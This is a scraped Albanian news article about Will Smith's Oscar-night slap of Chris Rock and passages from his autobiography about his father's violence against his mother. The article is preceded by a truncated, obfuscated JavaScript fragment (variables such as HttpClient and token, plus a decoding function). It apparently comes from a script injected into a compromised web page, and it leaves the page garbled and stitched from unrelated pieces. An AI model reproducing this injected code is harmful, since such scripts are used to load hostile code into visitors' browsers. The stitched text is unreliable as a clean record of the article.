;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Nga dhimbja që s’e kishte mbrojtur nënën nga rrahja, e deri te reagimi për bashkëshorten e vet

By

Will Smith mbrëmë e fitoi Oskarin për aktorin më të mirë.

Por kush do të thoshte që në natën më të shpërblyeshme të jetës së tij si aktor, gjëja e fundit për të cilën do të flitej do të ishte suksesi i tij i korrur mbrëmë.

Pothuajse të gjithë po flasin për shuplakën e tij ndaj komikut Chris Rock, i cili bëri një shaka në llogari të bashkëshortes së Smithit, Jada Pinket-Smith.

Pinket-Smith vuan nga alopecia, një sëmundje që shkakton rënien e flokëve, andaj i mban flokët shkurt, dhe Rock iu drejtua me “G.I. Jane”, në bazë të personazhit që e luan Demi Moore, të një grua që i rruan flokët pasi vete në ushtri.

Catherine Shoard  në një shkrim të saj për The Guardian përmend fragmente nga autobiografia e Smithit ku ai shpreh një pendesë të thellë që në një rast nuk e kishte mbrojtur gruan e shtëpisë, atëbotë nënën e tij.

Në autobiografinë e tij të dalë në nëntor të vitit të kaluar, aktori përshkruan në detaje dhumën e tmerrshme në familje të cilën ai dhe tre fëmijët e tjerë e kishin barë tek e ushtronte babai i tyre, Williami, ndaj nënës, Carolines.

Smith shkruante se si nuk ishte dhuna që e traumatizonte atë, por mosveprimi i tij kur shihte diçka të tillë.

“Brenda çdo gjëje që e kam bërë që atëherë – krejt  çmimet dhe arritjet, vëmendja dhe fama, personazhet dhe të qeshurat – ka qenë një varg kërkim-faljesh ndaj nënës sime që nuk pata vepruar të ditë. Që e pata lënë në lloç në atë moment. Që pata dështuar t’i dalë ballë babait tim. Që u tregova qyqar”, shkruante Smith.

“Ajo që keni arritur ta njihni si ‘Will Smith’, MC-ja që i shkatërron jashtëtokësorët, ylli madhështor i filmave, është fare një konstrukt – i krijuar dhe mjeshtëruar me kujdes për ta mbrojtur veten time. Ta fsheh veten nga bota. Ta fsheh qyqarin”.

“Si fmëijë gjithmonë kam thënë që një ditë do të hakmerrem për nënën time. Pushova në majë të shkallëve. Mund ta shtyja babanë poshtë dhe të shpëtoj lehtë me këtë. Shyqyr Zotit që gjykohemi nga veprimet tona dhe jo nga shpërthimet tona të brendshme të nxitura nga traumat”.

Artikuj të ngjashëm